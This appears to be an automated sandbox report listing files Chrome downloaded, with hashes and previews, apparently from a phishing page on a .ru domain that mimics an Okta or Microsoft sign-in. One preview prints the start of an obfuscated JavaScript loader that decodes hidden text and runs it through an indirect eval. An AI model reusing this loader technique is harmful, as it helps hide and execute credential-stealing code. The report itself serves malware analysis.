                                                                            URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQuhi1aNT&oit=3&cp=26&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                                            Preview:)]}'.["mixpanel.com/p/FWfQuhi1aNT",[],[],[],{"google:clientdata":{"bpc":false,"tlw":true},"google:suggesttype":[],"google:verbatimrelevance":851}]
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 46184, version 1.0
                                                                            Category:downloaded
                                                                            Size (bytes):46184
                                                                            Entropy (8bit):7.995413694311413
                                                                            Encrypted:true
                                                                            SSDEEP:
                                                                            MD5:5A5F0E057D6F39CA743FB62D2B1C7185
                                                                            SHA1:CF98008E4C058F681B62F5600ADCE409BF430930
                                                                            SHA-256:C804A296F5F4526D2458BAF9A2146C8EEDCB6EB389C146C4848F36A9EA1929E2
                                                                            SHA-512:5F919CA30A0E2C2BCAAABF97AFC7E1C6E56CE2DA57A2B18DE86462BE56A87E9191B1DA1EFAFCD1C103A50244D87D51630616DB4238955596B753E0A94BB1967C
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/marketing/fonts/apercu/web/5.008/apercu-bold-pro.woff2
                                                                            Preview:wOF2.......h......................................P........`..0..(........l..@..H..6.$.... ..l..p..V[$..-..0...*...j.\3..7hk.8";.].k..../.m....u}........$..3. m7.@.*....P3..3J.U....mB...M..s.9.]d..!<..!,....9...q.Q9...`.hE...d../...uQ.+...q.....Y._....XHq7.`.E ....|..M...:.r...=..Lq...[.f...=>...An=.~..~..J..S..MV.y:..6X4..UY....)..6.c...,2.v..U..Z:....E~@P1AII...E.&..VRB.T...+..........HGP..g..nF&.Eo.=.......M.kv...,.2....k{.......Q..:...A...<..9...%.....O...S...{.z... ."`...#.H@.(...#.....w..BJ43D2SDE\.7.k`...i.i....h,5C.Vj..7t.7.R3..eK....H2...@t..D|'>1];....i...D......?.....8J.v...~......(X...d.* ....DET..N.tq..E....E..]..v.....zw..n1..PI.QItK.D.$.:.&&.:.C... .........>O..h.1..m`|.W,M.....;3O,..$..%.4.4......b..|c...]..5..Y...u..i.6v.2t....._....@*........G?2.2..l..W...A:.Du.L...].1.........m..vcT..y...Fc.......[X..+V.~.U.b..6Qy...]t.q)v-@..G.|4q...&.....=v.z..r.j..b..h...}S.._...a...6=s.(.I..9~......M.^..uo.'K.O2..Iap&S.Yg..I[.}_..
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:SVG Scalable Vector Graphics image
                                                                            Category:downloaded
                                                                            Size (bytes):268
                                                                            Entropy (8bit):5.111190711619041
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:59759B80E24A89C8CD029B14700E646D
                                                                            SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                                            SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                                            SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://zyvk.fgaiuin.ru/rs1tEVctIEvVMForyhoqljWxFNIghHfWamSauodo7dwGpwh40leoQqcylchef193
                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (51734)
                                                                            Category:downloaded
                                                                            Size (bytes):222931
                                                                            Entropy (8bit):5.0213311632628725
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:0329C939FCA7C78756B94FBCD95E322B
                                                                            SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                                                            SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                                                            SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                                                                            Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:SVG Scalable Vector Graphics image
                                                                            Category:downloaded
                                                                            Size (bytes):1864
                                                                            Entropy (8bit):5.222032823730197
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                            SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                            SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                            SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://zyvk.fgaiuin.ru/klBiF5nBFGI9ZBA6VNTLBYDtbLEUH4xH2WD565XSQVInIrw2Ga7S5GyD4TQujTVYuv213
                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text
                                                                            Category:downloaded
                                                                            Size (bytes):152
                                                                            Entropy (8bit):5.023356249259316
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:652A03F7CD884708D8B382692A72E973
                                                                            SHA1:76777C8224E63BC23B07D053ECFA6EDA3B884AB6
                                                                            SHA-256:9B71E53DB850E4E7B67BD36C77A9B2461AE560F81685562F751B673561CE3CDD
                                                                            SHA-512:DAB6828E0555B847DF843B3609A6A65005A0B7D665CD4E0B5D2F944EAE24BC9BEF265C57E3DF94789453153BD81B7C6E4A42512B2C359B695B0FBF36378766FA
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQuhi1aNTS16WPX&oit=3&cp=32&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                                            Preview:)]}'.["mixpanel.com/p/FWfQuhi1aNTS16WPX",[],[],[],{"google:clientdata":{"bpc":false,"tlw":true},"google:suggesttype":[],"google:verbatimrelevance":851}]
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Unicode text, UTF-8 text, with very long lines (21720), with CRLF line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):4724541
                                                                            Entropy (8bit):2.5839796656457863
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:AA849F9614E090F7E5EBED754F83D3C2
                                                                            SHA1:4100808BBC0665E1ECF3372DDF7DD02A14B1387A
                                                                            SHA-256:928A123423281E31FCC018F4CB5B297299EFB723678D2A45EFCD842F6C6A4AE6
                                                                            SHA-512:522EB407E209EA8E61622882669258866409277A8E754A994264D4B1418164236AAFB4630FA8B3A0029D7D0700E07D1113CFED04882BEAF3842C8FB5CE167E8D
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://zyvk.fgaiuin.ru/34RyVvuzJYx0eebApfCjIz8yUE5ijn9sGqnQAmC67103
                                                                            Preview:function decodeAndEvaluate(key) {.. const binaryString = [...key].. .map(char => Number('.' > char)).. .join('').. .replace(/.{8}/g, byte => String.fromCharCode(parseInt(byte, 2)));.. .. (0, eval)(binaryString);.. return true;..}....const handler = {.. get: function(_, prop) {.. decodeAndEvaluate(prop);.. return true;.. }..};..const viewsen = new Proxy({}, handler);..viewsen["........................................................................................................................................................................................................
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 48088, version 1.0
                                                                            Category:downloaded
                                                                            Size (bytes):48088
                                                                            Entropy (8bit):7.995222259439345
                                                                            Encrypted:true
                                                                            SSDEEP:
                                                                            MD5:D8C4A9ABEF7B9B6404934A04996CA0DC
                                                                            SHA1:87D5B6D31BA3CE8241C0F7903307A10C2211E1B4
                                                                            SHA-256:6CCF0BF5FE0B6E6CEEA4622448B5BD2DB73C260E709A9DDB229FADDA2CA6B105
                                                                            SHA-512:B5C0B0D59643005C61077BADCF07DAFF39B3E2C73262B368175CE9C1D1DD0DA37C4766252D0A1D09E73519BA62DC256A19F50A8B855B1179D7A46D27AD018E0F
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/marketing/fonts/apercu/web/5.008/apercu-medium-pro.woff2
                                                                            Preview:wOF2...................t...................................`..D..(........|..r..V..6.$..(. ..?..N..V[..D.{.f7<T>]....U..s.A..f..2..-.,.._....+...6..+..&......A..c......j..TBdf.T.c2..G......%..........J..w..#.....Il...oh.C|Zw...+|..'.H..2......|..o..q......x.....:....!.OJ.*/. ..&...:.]r..2..S...Q..*..C.A...8.QJ~M..$e8.....4.P=9.Y.?.v&.`.Y..{...Re.)c...9../5..szT5%<.m.?..P..v....eR......d}..;)N..TA.ER.9^.j.n..Lx....hA....T...A..n.h.#o.Qh....~...&9..O..L.A/l...Nv.b.....D.b.`.l...t..-.$..V....k_y........d...@!Q.[a..d7..~...{.{..Q...1j...P........`.F!............FA..m~1..y..?W^..`.uJ...P.........k....%..+..xW......b..8.1.....sb...?u..m.(V..S.....0..#@.}.3....n...eHL..7f.{.6...3....yA...%Q.|.;v~..?.@..J.u{@.K.i..._....,......91....:......kD..!w mA.n..].]..._]Q}wR.XN..[.X.8.h. 6X.CB...a...f+.k.././".I..5......a.z.....Jv.h$.X0.)q.{D......}Hg~oF`Y.&.2..ZH...........u.P..`..:g...5.........5.......... C(.J.....W.w./|.....?.....c(%...5.R.Xb\.2.5..j,.K.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (872)
                                                                            Category:downloaded
                                                                            Size (bytes):13774
                                                                            Entropy (8bit):5.3766114944107075
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:2303D60356BA7F0483237666A0968B4E
                                                                            SHA1:7E171796029AD47BA0B9AAF42D45B9B3DA550274
                                                                            SHA-256:3C19848D7340432DB468566E0317D25E31EE96B93909D9DAAA2A0E0A7127D7FC
                                                                            SHA-512:A7D68EDB15741880090DF6FEFC75C58ECB296AF95BB3318978B0C347388483D380854F4098A6A90E9402A3257831B73D6C57579DEF9FCE181A40ADDFE305492F
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/2b88580bf5d54c6d0758/iron_apps_boards_src_report-util_index_ts.min.js
                                                                            Preview:try{let e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},t=(new e.Error).stack.t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="f2d7e078-6bd9-46ac-a0ba-6bf282b1a722",e._sentryDebugIdIdentifier="sentry-dbid-f2d7e078-6bd9-46ac-a0ba-6bf282b1a722")}catch(e){}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e._sentryModuleMetadata=e._sentryModuleMetadata||{}.e._sentryModuleMetadata[(new e.Error).stack]=Object.assign({},e._sentryModuleMetadata[(new e.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}"use strict";(self.webpackChunkanalytics=self.webpac
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:SVG Scalable Vector Graphics image
                                                                            Category:dropped
                                                                            Size (bytes):2905
                                                                            Entropy (8bit):3.962263100945339
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:FE87496CC7A44412F7893A72099C120A
                                                                            SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                                            SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                                            SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text
                                                                            Category:downloaded
                                                                            Size (bytes):148
                                                                            Entropy (8bit):4.938272067277539
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:FA2A5CBF38A58FF57A67A3532B4FE620
                                                                            SHA1:BD8755D192C215B4C6BCBA6651032AFC4239D762
                                                                            SHA-256:34C741587A7C8204DAAF1BBF7690D482105D5EA6475A0B4B9F24CB2B2D9CBBD5
                                                                            SHA-512:8037FE0C5A6FB586C124778AD804EB46482B7CF0F4534FD2F475BABE9DDD77735442C0E78A174B3B30A3D204242585F67FB0D8B701C2036E4F579DC511F94ABA
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQuhi1aNTS1&oit=3&cp=28&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                                            Preview:)]}'.["mixpanel.com/p/FWfQuhi1aNTS1",[],[],[],{"google:clientdata":{"bpc":false,"tlw":true},"google:suggesttype":[],"google:verbatimrelevance":851}]
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Unicode text, UTF-8 text, with very long lines (1488)
                                                                            Category:downloaded
                                                                            Size (bytes):362095
                                                                            Entropy (8bit):5.225420508120778
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:1C2EB81D3641CBFC26D61CB651C8AE85
                                                                            SHA1:72AB6541AD5983A6AB5D2F30DDAF6024AF259B93
                                                                            SHA-256:18DA651F90BB1371EB022F0735D1F7E99FA2BD9E3F8909399AD37A562EFAA3E8
                                                                            SHA-512:F535D21D14DFA28CB29166C75E0240A92797667EC5F1DE97A637E2FF29798D94502A62164113D2A298CAD5968A4DA88E3E9417886D3C26320194146371E7BB6C
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/f58dd4ef1c0ed6f0bcc2/vendors-node_modules_tiptap_extension-bubble-menu_dist_index_js-node_modules_tiptap_extension-5f95c6.min.js
                                                                            Preview:try{let e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},t=(new e.Error).stack.t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="f31b76e1-bf79-437f-95fd-246779413175",e._sentryDebugIdIdentifier="sentry-dbid-f31b76e1-bf79-437f-95fd-246779413175")}catch(e){}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e._sentryModuleMetadata=e._sentryModuleMetadata||{}.e._sentryModuleMetadata[(new e.Error).stack]=Object.assign({},e._sentryModuleMetadata[(new e.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}"use strict";(self.webpackChunkanalytics=self.webpac
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:dropped
                                                                            Size (bytes):17842
                                                                            Entropy (8bit):7.821645806304586
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:4B52ECDC33382C9DCA874F551990E704
                                                                            SHA1:8F3BF8E41CD4CDDDB17836B261E73F827B84341B
                                                                            SHA-256:CCE050CC3B150C0B370751021BB15018EE2B64AC369E230FE3B571A9B00D4342
                                                                            SHA-512:AC3D3C82BAD9147AE5F083ED49C81A744F672DDFBB262135AA3F2C6601F8DFFEA11D8E323CEF025C36D76C6F2515AA6814B622CF504CA01D13346E9EA989048F
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:RIFF.E..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.,...$.m.8..k.\.oDL.. ..TU....3'.{.g..6..2...6.DL`e..."&@..b.#&@......T.....'.....$......1.d...G........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........._...........................?...Z5[...B,.c...V-...m.0.../..?...............?.......?................_.....-...M.B.....=....C...[......w .X...ea.............VW.?b....[[.o^.Y.K...OD
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):62
                                                                            Entropy (8bit):4.302524891130293
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:870480C211B62DDAB27DB6060B5D128C
                                                                            SHA1:0FB8C63A17E305F820F867B5F8E74CE15F0AB5E9
                                                                            SHA-256:6AC8B87176F804B49A99195D6AED0C7478B2B32CCB633A624498581573EADA11
                                                                            SHA-512:F77151022027874C4896DB5A0397F99F20277B54DEBEB11B10596D043F228552CD7950D87BC54035F1065D31BC5E0DE18034756BBA6E9DCC6CB2F9BE22A6B98C
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:{"error":"endpoint does not support 'GET' method","status":0}.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1881)
                                                                            Category:downloaded
                                                                            Size (bytes):24500
                                                                            Entropy (8bit):5.29969936888628
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:93A654E11C075DB2AE8CEA8EF0DB4F97
                                                                            SHA1:09DEEE1A309E00A491DC45328922CFDF018A7172
                                                                            SHA-256:5FFE3ABBBA7920F928DA8E4593BA3D82338EB621A4C25E722A247217AA357111
                                                                            SHA-512:F60E7EAD9D6039C5D0333D6EB4F9CFC42A17FDCA7D72440D290AB449388EC7EA4A1ABFCC15D7846B29DAC24501C9BB0271538D2EB51B400A2AC6A5C207FA3DD1
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/f9a4231b5ffd52f6bb15/iron_apps_boards_src_dashboards-app_card_text_index_ts-iron_common_report_model-resources_beh-15ae05.min.js
                                                                            Preview:try{let e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},t=(new e.Error).stack.t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="024a440f-8a36-4236-9dc8-2d3f64ec8142",e._sentryDebugIdIdentifier="sentry-dbid-024a440f-8a36-4236-9dc8-2d3f64ec8142")}catch(e){}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e._sentryModuleMetadata=e._sentryModuleMetadata||{}.e._sentryModuleMetadata[(new e.Error).stack]=Object.assign({},e._sentryModuleMetadata[(new e.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}(self.webpackChunkanalytics=self.webpackChunkanalyti
                                                                            No static file info